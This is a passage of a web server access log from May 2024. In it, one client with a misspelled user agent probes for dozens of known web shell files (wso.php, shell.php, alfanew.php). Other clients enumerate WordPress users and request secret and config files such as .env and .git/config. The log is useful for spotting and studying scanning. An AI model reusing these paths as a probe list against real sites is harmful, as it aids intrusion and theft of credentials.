"-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:01:20 +0700] "GET /lufix.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:01:33 +0700] "GET /doc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:01:42 +0700] "GET /bak.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:01:52 +0700] "GET /content.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:02:00 +0700] "GET /upfile.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:02:09 +0700] "GET /wp.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:02:18 +0700] "GET /wp-conflg.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:02:31 +0700] "GET /bypass.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:02:39 +0700] "GET /wp-activate.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:02:54 +0700] "GET /404.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:03:02 +0700] "GET /updates.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:03:14 +0700] "GET /radio.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:03:26 +0700] "GET /plugins.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:03:32 +0700] "GET /xmrlpc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:03:36 +0700] "GET /ae.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:03:40 +0700] "GET /moon.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:03:43 +0700] "GET /blog.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:03:47 +0700] "GET /themes.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:03:52 +0700] "GET /ini.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:03:59 +0700] "GET /as.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:04:07 +0700] "GET /shell.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:04:15 +0700] "GET /ws.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:04:23 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:04:33 +0700] "GET /makeasmtp.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:04:45 +0700] "GET /wp-sigunq.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:04:52 +0700] "GET /wso112233.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:05:00 +0700] "GET /wp-atom.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:05:09 +0700] "GET /alfanew.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:05:20 +0700] "GET /fw.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:05:28 +0700] "GET /install.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:05:35 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:05:50 +0700] "GET /mini.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:05:58 +0700] "GET /configs.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:06:06 +0700] "GET /test.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:06:15 +0700] "GET /classsmtps.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:06:22 +0700] "GET /wp-hudbud.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:06:44 +0700] "GET /inputs.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:06:51 +0700] "GET /autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/May/2024:05:06:56 +0700] "GET /text.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 65.154.226.171 - - [09/May/2024:10:21:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" 142.93.154.26 - - [10/May/2024:17:25:03 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 35.93.35.255 - - [12/May/2024:03:29:20 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9)" 175.27.239.82 - - [13/May/2024:03:31:34 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 175.27.239.82 - - [13/May/2024:03:31:41 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 175.27.239.82 - - [13/May/2024:03:31:45 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [13/May/2024:17:14:55 +0700] "GET /simple.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [13/May/2024:17:15:25 +0700] "GET /chosen.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [13/May/2024:17:15:49 +0700] "GET /inputs.php HTTP/1.1" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 198.235.24.159 - - [14/May/2024:13:15:57 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 91.92.252.169 - - [15/May/2024:07:41:46 +0700] "GET /wp-ver.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 31.186.172.143 - - [17/May/2024:22:22:10 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 31.186.172.143 - - [17/May/2024:22:22:27 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 31.186.172.143 - - [17/May/2024:22:22:36 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 198.235.24.98 - - [18/May/2024:23:09:19 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 198.235.24.19 - - [19/May/2024:07:25:32 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 39.105.120.190 - - [19/May/2024:22:53:15 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 39.105.120.190 - - [19/May/2024:22:53:20 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 39.105.120.190 - - [19/May/2024:22:53:24 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 115.231.78.2 - - [20/May/2024:21:20:27 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.2623.112 Safari/537.36" 115.231.78.2 - - [20/May/2024:21:20:47 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 115.231.78.2 - - [20/May/2024:21:28:40 +0700] "GET /login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 91.92.252.169 - - [20/May/2024:23:04:57 +0700] "GET /repeater.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:05:15 +0700] "GET /admin.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:05:20 +0700] "GET /inc.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:05:26 +0700] "GET /lv.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:05:33 +0700] "GET /seo.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:05:47 +0700] "GET /x.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:05:55 +0700] "GET /b0x.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:06:08 +0700] "GET /about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:06:12 +0700] "GET /cloud.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:06:15 +0700] "GET /wso.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:06:20 +0700] "GET /cong.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:06:42 +0700] "GET /network.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:06:50 +0700] "GET /css.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:06:54 +0700] "GET /wp-2019.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:07:03 +0700] "GET /atomlib.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:07:13 +0700] "GET /css.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:07:56 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:08:07 +0700] "GET /log.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [20/May/2024:23:08:20 +0700] "GET /index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 54.255.178.149 - - [21/May/2024:10:17:53 +0700] "GET /.well-known/acme-challenge/wPOPAW6Q9U014_kqIxGjyshKgc1X2u_pW3a6LzgLS8I HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 23.178.112.107 - - [21/May/2024:10:17:53 +0700] "GET /.well-known/acme-challenge/wPOPAW6Q9U014_kqIxGjyshKgc1X2u_pW3a6LzgLS8I HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 16.16.196.58 - - [21/May/2024:10:17:53 +0700] "GET /.well-known/acme-challenge/wPOPAW6Q9U014_kqIxGjyshKgc1X2u_pW3a6LzgLS8I HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 34.223.229.216 - - [21/May/2024:10:17:53 +0700] "GET /.well-known/acme-challenge/wPOPAW6Q9U014_kqIxGjyshKgc1X2u_pW3a6LzgLS8I HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 3.140.201.143 - - [21/May/2024:10:17:53 +0700] "GET /.well-known/acme-challenge/wPOPAW6Q9U014_kqIxGjyshKgc1X2u_pW3a6LzgLS8I HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 96.126.110.74 - - [21/May/2024:10:19:21 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 96.126.110.74 - - [21/May/2024:10:19:21 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA084438) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.1738.98 Mobile Safari/537.3" 96.126.110.74 - - [21/May/2024:10:19:22 +0700] "GET /server HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 96.126.110.74 - - [21/May/2024:10:19:22 +0700] "GET /.vscode/sftp.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 96.126.110.74 - - [21/May/2024:10:19:23 +0700] "GET /about HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 96.126.110.74 - - [21/May/2024:10:19:24 +0700] "GET /debug/default/view?panel=config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 96.126.110.74 - - [21/May/2024:10:19:24 +0700] "GET /v2/_catalog HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 96.126.110.74 - - [21/May/2024:10:19:25 +0700] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 96.126.110.74 - - [21/May/2024:10:19:25 +0700] "GET /server-status HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 96.126.110.74 - - [21/May/2024:10:19:26 +0700] "GET /login.action HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 96.126.110.74 - - [21/May/2024:10:19:26 +0700] "GET /_all_dbs HTTP/1.1" 301 162 "-" "Mozilla/5.0 (l9scan/2.0.633323e223e2335313e2330313; +https://leakix.net)" 96.126.110.74 - - [21/May/2024:10:19:27 +0700] "GET /.DS_Store HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 96.126.110.74 - - [21/May/2024:10:19:27 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 96.126.110.74 - - [21/May/2024:10:19:28 +0700] "GET /.git/config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 96.126.110.74 - - [21/May/2024:10:19:28 +0700] "GET /s/633323e223e2335313e2330313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 96.126.110.74 - - [21/May/2024:10:19:29 +0700] "GET /config.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 96.126.110.74 - - [21/May/2024:10:19:29 +0700] "GET /telescope/requests HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 96.126.110.74 - - [21/May/2024:10:19:30 +0700] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 68.235.38.147 - - [21/May/2024:10:20:31 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Mobile Safari/537.36" 103.87.68.57 - - [21/May/2024:10:20:31 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 51.75.141.254 - - [21/May/2024:10:20:32 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0" 197.242.156.69 - - [21/May/2024:10:20:33 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.36" 164.90.241.135 - - [21/May/2024:10:21:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MSDK/5.31.000.7427 mQQAppId/1105478048 mWXAppId/wxec355d612d8ebc6b mGameId/10120 MSDKDeviceModel/" 164.90.241.135 - - [21/May/2024:10:21:05 +0700] "GET /favicon.ico HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1" 205.169.39.171 - - [21/May/2024:10:22:31 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 205.169.39.171 - - [21/May/2024:10:22:49 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 